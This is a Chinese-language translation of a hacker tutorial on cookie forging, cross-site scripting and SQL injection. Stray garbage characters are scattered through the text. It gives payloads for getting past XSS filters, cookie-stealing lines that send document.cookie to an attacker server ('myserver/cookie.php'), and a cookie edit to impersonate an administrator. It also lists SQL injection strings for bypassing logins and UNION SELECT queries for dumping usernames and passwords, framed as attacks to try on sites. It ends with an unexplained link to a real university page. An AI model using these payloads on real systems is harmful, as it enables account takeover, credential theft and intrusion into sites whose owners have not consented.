XSS & SQL注入

admin

XSS & SQL注入
文章作者：CyberPhreak
) Q9 b: Y+ C6 f; |7 m译文作者：黯魂 [S.S.T]

4 k$ h! [% t4 w0 @
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
1 G; b8 I$ q' LX Web Security - XSS & more X
% e6 ~1 ]( Z! F0 w  v) tXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
0 \2 P; e  k4 q3 w4 a" i; K- N# [  T
: b8 m; I0 e  j  P* Y
7 l% X. j: Y" r: s- o6 o0 c$ t~介绍
' J1 P- Q& o/ M$ u, _
2 A$ l# U3 b4 P7 D) f8 e3 U! _在这篇文章中我将说明所有关于XSS以及更多相关的知识.通过这篇文档,我希望能让你明白什么是XSS,为什么使用XSS,以及怎样使用XSS.一旦你学会了,你将需要发挥自己的创造力,因为大多数人都修补了简单的XSS漏洞.但是他们所忘记做的是修补比XSS的一个字符串更多的漏洞,并且php中特殊安全机制被用来防御XSS,而取代他们自己的方法.同时我将阐述的不仅仅是XSS,而是所有的web安全.

XXXXXXXXXXXXXXXXXXXXX
X Table OF Contents X
' q  ~% d7 b; _0 T- S9 p+ VXXXXXXXXXXXXXXXXXXXXX
- [( {% m, F. ?. v5 t1 F
, J! O; l5 Q8 h, `4 B) @3 nXXXXXXXXXXXXXXXXXXXX
/ h" }6 {- z) q) J) _/ T' \( \X Cookie Editing X
X XSS X
X SQL Injection X
! I! O/ n2 m$ w' ~: h& mXXXXXXXXXXXXXXXXXXXX

~什么是cookie
0 _( C7 p6 x; B, J5 O
/ J1 w3 q' t- V% V# gcookie就是一块数据.一旦你浏览一个站点并且注册一个帐号,一个cookie就被设置以记录你的信息.cookie仅仅保存你登录的信息以使站点检测以前你是否登录过,如果不是,它就会检测你的用户名和密码的正确性,然后登录.比如说在一个夜总会,你买了一张票,他们就会给你一张卡.因此你可以进进出出而不用每次都买票.而cookies比你所能看到的要复杂得多.夜总会只能记住你一晚上,但是cookies却能记住你一辈子.
$ T9 l' O8 C0 K' W3 J9 D3 b. S
! D7 h; v- u/ F8 X- ^1 w0 o~警告&欺骗
. S0 d; |" Y3 F: W5 p! a
那么现在你知道了cookie是什么...你如何看待它们?事实上,cookie编辑(修改)是最简单的方法之一.只要有一个浏览器,你就能够查看和编辑cookies,并且只需要一些基础的javascript知识.打开你的浏览器然后随便去一个网站吧,登录...现在输入javascript:alert(document.cookie).这时你应该可以看见一个用户名和密码.然而大多数站点现在都不使用cookies,而使用sessions.很遗憾,sessions不能被修改(服务端可以),不像cookies,一旦你修改了一个cookie你就可以欺骗你自己.现在让我们开始欺骗...假设你看到了一个警告框并且看到一些像这样的内容:

strusername=cnsst;strpassword=cnsst

此时假设你知道'bitch'是一个管理员,可是你不知道密码. 由于脆弱的安全机制你不需要密码:javascript:void(document.cookie="strusername=bitch")
$ h+ Z/ r: r( o  a% q! B现在输入:javascript:alert(document.cookie).那几乎非常接近cookie修改了...
, {) R9 ~+ P3 q
~什么是XSS

+ {9 y) f$ ]  L1 o3 FXSS,或者CSS,不管你更喜欢怎样称呼它,XSS(CSS)都代表着跨站脚本.基本上意思就是你能以任何方式注入脚本,来让它完成你想要做的.通过XSS你也可以截获输入信息,像用户名,密码以及cookies.这都将被讨论,所以接下来将会有很多例子,我们这篇文章应该能够帮你在XSS上发挥自己的创造力.

~为什么使用XSS

很明显的问题,通过XSS你能在客户端和服务器端执行任何类型的脚本.然而XSS却不仅仅局限于执行脚本上,还能截获输入.输入类似:<input name="name" type="name">
5 B+ e0 f+ f* F你通过XSS截获输入,然后通过一个秘密文件把截获到的信息发送向你的站点.而这一切绝不是XSS所能实现的全部作用.XSS还能截获cookies.Cookies保存着有价值的信息,像用户名,密码等等.
4 l# i8 O& E. _7 x% w' [
~让我们开始吧…
0 q8 @* c9 N* C9 G# W1 e7 h* B9 v$ \
我假定你知道html和javascript,而php知识也有帮助,但却不是必要的.让我们从这个php脚本开始.

XSS--跨站脚本&lt;html&gt;

&lt;body&gt;
9 M  P: c, i/ c. f8 R' m  J/ S* H
&lt;form action="" method="GET"&gt;
4 w0 E* i" L8 p3 P3 a( x
&lt;!-- 我使用的GET方法,因为当我们利用的时候更容易练习. --&gt;
" h* [2 a+ E/ f# i
: s' X: w$ @9 [; v, i& t; pScript: &lt;input name="name" type="name"&gt;
. z  R9 y+ _: @
&lt;input type="submit" value="submit"&gt;

&lt;/form&gt;
9 [+ \7 {9 h( H1 t
! R" m1 Q& b3 f$ j4 s9 V1 L&lt;/body&gt;
/ n0 w9 j+ a$ G
&lt;/html&gt;

; O! @1 _9 ^) |$ q( n% v

, F  U6 _) F1 d( o' l- t4 z&lt;?php
+ }3 I! J  [! Q* T1 t
$name = $_GET['name'];

' I5 a: `" s+ a" p# H8 l$ H% |echo("Hello $name");

9 T; _4 H4 r: b' S! L6 I# C# x?&gt;
复制代码OK,我们应该都知道上面的代码有什么用...这是一个非常奇怪的脚本,没有一个人会在自己的站点上使用它(至少我没见过),但是它对初学者理解原理却真的很有用.来看看我输入后所得到的信息:

5 a6 Z" C) ~5 X! N* C4 Dcnsst
" j! D  m$ e( t/ M+ A5 G( U; w! S"Hello cnsst!"
: \* r2 g* [6 L/ h" d2 e6 X
& w* [5 a: ~- C* m引号内的信息就是输出信息..注意看,现在我输入:
<script>alert(document.cookie)</script>

那么它将会弹出document.cookie!所以它是易受XSS攻击的!

现在我们已经对XSS有了一点了解,那让我们理解它.首先,脚本做的是取得你的输入然后粘贴它.嗯...也就是说我们能输入任何数据.所以?等等...任何数据...好的,你想问客户端和服务器端分别有什么语言? 让我告诉你,基本上客户端语言是建立在你客户端浏览器之上的:JavaScript,html, VBScript等等...

: j. Z9 _1 y8 v. L* L, B# Y服务器端语言在另一边,不是建立在你客户端之上的,而建立在服务器之上,有php,asp等等...
$ w. \7 o( Q! e: C" h5 P: U
+ c( X! `/ J  L( n' v  \; F已有一些方法注入php,稍后我将说明.现在先想想这怎样才能对我们有帮助?注入javascript?简单.比如说你正在编写一个网站程序,由于是你的站点,所以你能使用所有你想使用的javascript(JS).因此其他任何人也可以,因为XSS允许你让网站运行你想要运行的任何脚本.

让我们看一个稍微复杂点的例子!
3 r$ E: ?; P' W  \9 ^
* x' ]* h; X" g5 n! l- i假设你已经输入了<script>alert(document.cookie)</script>,并且回显是这样的:
. L4 a3 A; E/ Uscriptalert(document.cookie)/script
; a1 A4 B9 _& c9 y. u& g4 x或者可能是这样的:
scriptalertdocument.cookie/script

可以看出更难利用了...不过有很多方法使用XSS,这只是其中一种.而且是其中最烂的方法之一.你看到当中的"<>"都被空字符" "替换了.

让我们继续利用:
<<script>>alert(document.cookie)<</script>>
$ W- @0 o  ]6 O& q+ @1 P
你的输出将弹出document.cookie.
+ Y3 Q3 j$ Y9 B1 L% _6 g
" S; f; f. c% @2 J! I现在来看看更狠的:
<<script>>alert((document.cookie))<<//script>>
5 L8 F2 C" `; u/ F
1 p) k+ g* n, S2 S
# ?0 |" u4 h  Q他们可能会替换所有的,或者只是"<>".所以如果一对不能得以执行,另一对就可以.现在,如果你看到:
: m+ \: m" r" p0 `2 b- Lscriptalertdocument.cookie/script
- x- T' v) i5 {$ G或者 <<<script>>>alert(document.cookie)<<</script>>>  

' s' [8 I7 }1 p( J他们可能替换2对来欺骗你,或者替换一些字母.试着用你自己的方法来利用...你输入:
<script>alert(document.cookie)</script>
. x; _7 {$ B4 ~2 v
输出像这样:srplert(document.cookie)srp
9 F2 p+ ~& E6 K9 s( V, E
仔细观察,你就会发现document.cookie中并没有什么被替换.为什么呢? 因为他们并不清楚你想要alert什么,以及你想做什么.所以他们只是猜测,就只阻止了"<>"以及script部分.怎么绕过?看看这个:
<<sccriiptt>>aalert(document.cookie)<<//sccriiptt>>

7 _+ l2 j' y# H4 O2 ]1 O. m所有重复多余的部分刚好被替换!现在让我们来点更高级的!
" I* B. s" K5 q& i6 e: y
这次他们使用的仍然是替换,但是却检查了整个字符串!例如:
, S* v6 m' ]3 l1 d& e( |2 N  L) b; m  |<script>alert(document.cookie)</script>

* {. g- D3 I$ O! |. M# H6 x3 y输出将是:
; d* v& Y6 f/ P5 bscriptalert(document.cookie)script

# A4 a+ M' R9 V" T, k看到这,你激动地说,"我知道该怎么做了!" OK,让我们按照你的方法来重新构造:
+ w% {+ r, n* j. X<<script>>alert(document.cookie)<</script>>

输出:scriptalert(document.cookie)script. 这时你可能会继续增加更多的<>.可是,他们替换了任何"<>",无论你输入多少个...看到我说"任何"了吗?使用下面这个例子:

4 E, c5 U8 v# T( i( ^<
, {! k; Y8 f9 ~script
7 z0 [6 p' l; k0 a>
" i+ p* `% T, X, p9 Talert
(
) I' Q" M8 l6 |; `& X) i2 Rdocument
.
cookie
)
<
1 K, d$ _- t7 t  v4 q% I' F8 h/
4 o' ~5 H4 A5 a/ iscript
0 R, i3 u1 g7 z" a; p$ }* c>
1 w# s; |% U' p$ ]7 r
1 w: `3 ^8 Z7 i. ~- a
看看它,它没有替换"<>",它替换代码关键字.所以即便你写的是一句没有"<>"的代码,将仍然被替换,这就是我们为什么这样写的原因.假如对方使用更严格的标准,替换任何类型的代码,甚至是"alert"! 我们又该怎么改进呢?看看这个:
( F; z* y; N+ E, g<
s
c
r
4 @9 ~( V8 Q4 x. L: `, Ei
& W3 @- C- n1 m  xp
( u) d5 j2 U+ Z/ k* N! d5 s0 yt
; E' x! G. I7 P>
; d4 h/ b) r. O( h9 e: va
+ ^; n) D2 E- j% ll
* e8 t& S5 r% g& m/ |/ ye
r
1 S- ~: C% }" v- v) yt
(
d
, k- S# i. m" N3 |$ Lo
" N: x. w' j' y- j7 Oc
9 g$ W) L$ F4 S) X7 [) {u
m
; o/ u5 `4 P, q/ P# de
- p) e9 B: v1 I9 u. j7 P0 E8 ]( Ln
# Z! h# S* a9 m% e! {( \t
4 X- m3 u3 z. R.
c
, u$ K6 W# a" K. s8 k9 |* I" E8 lo
2 w) x6 j# ?7 n$ _( ?4 B1 Fo
- u; ~/ \) \& {/ u2 kk
6 h" g( r7 u& P5 ?i
e
' F! Y; U0 ^* z0 l0 ~)
<
, V0 B/ P9 h- [( n/
% F! n  B! o: e5 fs
c
, I/ S6 C! e( r4 W/ fr
2 N' ?% V/ W% n) X; ?( {i
p
: O2 \1 {8 ?' p8 K; Xt
/
>

这下应该可以了,但是如果他们仍然替换"<",你可以增加2对"<< >>"(并且你可以用任何字符取代document.cookie)
0 J9 A4 M8 |* F& d8 f2 m7 b
7 ?* k$ W( K8 \7 h+ m还有更多我可以演示的替换,但是我教你的只是想让你发挥自己的创造力.

现在让我来讲讲其他XSS方法.前面我们已经讨论了客户端XSS,那么现在就来看看服务器端XSS.

首先让我说明它们之间的区别.客户端是从你浏览器经解释语言,如JavaScript (JS) VBScript (VBS)等而看到的.服务器端XSS是通过来自服务器端的语言,如php,asp等的XSS.客户端通过浏览器查看,服务器端通过服务器查看.

我们已经学会了怎样构造客户端XSS,而构造服务器端我们必须注入脚本到服务器上.要完成这个,我们需要找到一个像任何XSS的脚本,但是这个脚本能够保存你的XSS到服务器中.现在,假设你在一个网站上发表了一篇文章,现在要做的是取代文章,用XSS,为什么我们应该用JavaScript?为什么不用php?但是先让我给你看点东西.
6 u- L# i$ F4 f/ X# p0 f# [document.forms(0).action ="http://myserver/myscript.php
这既能在服务器端也能在客户端,没有关系.因此你的脚本将复制他们所输入的信息到那个表单中,并保存在我们站点上的一个*.txt文件中.

再次假设你在网站上注册了一个帐号,并且可以自定义资料...
& U. a) r7 m8 e$ w# u# ^' ]) \8 bdocument.images(0).src="http://myserver/cookie.php"+document.cookie.
6 Q( O, X* I8 z  X9 U) d4 C或者如果你有空间可以存放指向自定义内容的链接,你可以输入:
javascript:location.href="http://myserver/cookie.php"+document.cookie
0 X+ I* `' S& T7 R3 Z0 |9 s" g这将截获访问我们资料的用户的cookie.这可以用于任何地方而不仅仅在资料上,它只是一个例子.
: G( Z: z. F% h7 P, s
有时一个站点会回显你的UserAgent和Referer...现在让我们在DOS提示符下或者命令行窗口中试一试一些XSS,
telnet example.com
9 c, ~1 _  p9 {2 J, VGET /page/toplacewhere_itechos_your_useragent.php HTTP/1.1
User-Agent: &lt;script&gt;alert(document.cookie)&lt;/script&gt;
$ A" _5 ~/ O. K3 e# g& L5 NReferer: &lt;script&gt;alert(document.cookie)&lt;/script&gt;
~什么是SQL注入
8 T8 T8 {9 m% J# Y# \2 r' x
SQL注入,网站中最大的安全问题之一.那么到底什么是SQL注入?其实也就是注入SQL.现在让我们来挖掘不同级别的SQL漏洞.假设你有一个像这样的登录页面:&lt;html&gt;
' a! u7 ]2 ~" ]2 d" G
&lt;body&gt;
7 Y" g/ x* l4 q, o' s, h- f
&lt;form action="" method="POST"&gt;

. m& L" r2 N' T% @/ ?: U+ p3 V( W/ jUsername: &lt;input name="name" type="name"&gt;

Password: &lt;input name="password" type="password"&gt;
" y" s6 i6 W! m9 D  P2 T, q0 n+ t
&lt;input type="submit" type="submit" value="Submit"&gt;
, E' ^# y; }, T5 {( [8 N- B/ p( c
&lt;/form&gt;

- k( p) u9 q" v5 |- G6 H% F&lt;/body&gt;

: k0 Q- M6 S+ d  P( Q3 T1 g&lt;/html&gt;
复制代码这里面有一个XSS漏洞,但是不用担心它,没有办法猜出或者破解出密码.所以,我们该怎么办?SQL注入!

最简单的攻击是在用户名和密码那里输入"'".如果没有保护机制,此时你应该得到一个错误信息.如果你得到了,它就是极易受攻击的.可是错误信息毫无价值,除非你知道如何利用它.所以,我会给你一个你可以使用的注入列表,以便在你得到一个单引号的错误信息时使用.

'='
'OR 1=1--
'OR a=a--
'OR'

自从人们增强安全性以后,现在这些注入就很难发挥作用了,但是下面这个列表却是很多人在安全列表里没有注意到的:

! h$ y% b$ N0 B. ~9 ]! }4 k'OR''='
! e( ^; D4 N  b% m'OR"="
/ N6 _+ ]0 t5 X- \3 m'OR'="
8 [; e8 y/ |+ X# N5 u9 {'OR '="
: ^. P; p  ~5 M) k- j4 A( ?'OR "='
9 a8 \+ B- W/ v- W7 S( P'OR ''='
! l; n- d* p' D& [6 I- D& Z+ x' h'OR '=''
/ l8 }7 l1 z9 y: \+ O! t1 Z: E' _3 v'OR "=''
' ?) t4 X$ g* Y* I) Z4 l) \'OR ''="
1 G' E/ P7 ]; z
) ?% _8 z  m7 q8 e9 J
7 A8 ^# J& Z, r+ u& H- j, n' b~
; N- B, `0 t' Z现在让我说明UNION ALL SELECT声明,这将选出数据库中的一个表...所显示的内容取决于你所选择的列.
UNION ALL SELECT username,password FROM users

这个查询语句将执行,但是….如果毫无作用呢?
, K; K/ W/ Z; ]4 u% W5 M3 C, sUNION ALL SELECT username,password FROM users WHERE username='OR "='
AND password='OR "='

5 u' u5 l# J- L8 r6 ]! K你可能使用其他字符来替代'OR "='以注入存在的注入点.可是首先考虑一下,你是怎么知道表名的?实际上,你发现了一个SQL漏洞,它给了你错误信息,而错误信息包含了表名.
- Y2 C/ c/ p( J0 ?( t# r# v- z! g" `0 V
7 P. c! {  K% l0 W% ]. m4 {5 n5 ^一旦你发现了漏洞,你就会按照习惯去用类似'OR "='的方法去进行注入,以得到表名.有时候你想从表中查询一些有用的数据,你却不得不选择所有的表,因为你并不知道所要查询的数据在哪个表里.下面的例子中存在20个不同表名的表,你试图查询一个ip的列表:
( J- J; J  _4 }/ z* w: h$ u1 ?) zUNION ALL SELECT
. X$ |" y: B9 [3 _, d" y  aip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip FROM logs
WHERE ip='OR''="
* f2 J) U! Z% {6 c+ u
2 a$ @' \/ a8 h. V- {+ p' V6 d现在你看到这个了吗?(我确信你已经看到了)
2 c1 P) _5 D  V- [8 V, z% X3 S+ U3 ihttp://example.com/index.php?article=34
+ w5 M* I' Z( P那将浏览Id为34的文章...让我们用"'"替换34:
, t# [8 U. `$ {$ @http://example.com/index.php?article='
- A) Z4 b) F( O% Q
  l$ r6 R1 E* v3 l6 c
' D1 N' u0 W( C! E8 x! U: f9 t现在,记住我所说的,大多数人都没有意识到'所带来的不安全性,你总是能够尝试不同的注入方法,这里是一些例子:
' u& G% k* h; Chttp://example.com/index.php?article='
http://example.com/index.php?article='='
" ?" Z% x" p- f, ?# _http://example.com/index.php?article='OR 1=1--
( C/ a/ A: Y9 d2 ~/ Qhttp://example.com/index.php?article='OR a=a--
http://example.com/index.php?article='OR '="
6 E8 D& P9 U1 b* `- s0 i2 jhttp://example.com/index.php?article='OR "='
http://example.com/index.php?article='OR ''='
+ s9 \3 g/ A+ m3 d: Z  Lhttp://example.com/index.php?article='OR '=''
1 y* }* ~2 Y) Y2 z$ W! Ihttp://example.com/index.php?article='OR''='
: m2 I. w0 @2 ~( Z! Vhttp://example.com/index.php?article='OR"'='
2 a/ e& F$ U7 P) m9 ]http://example.com/index.php?article='OR"''='
$ U. {7 _1 c8 y6 {2 n, v
8 i' r' X, {6 M) c6 U$ e尽情发挥自己的创造力!
http://www.ie.tsinghua.edu.cn/notice/show.php?id=704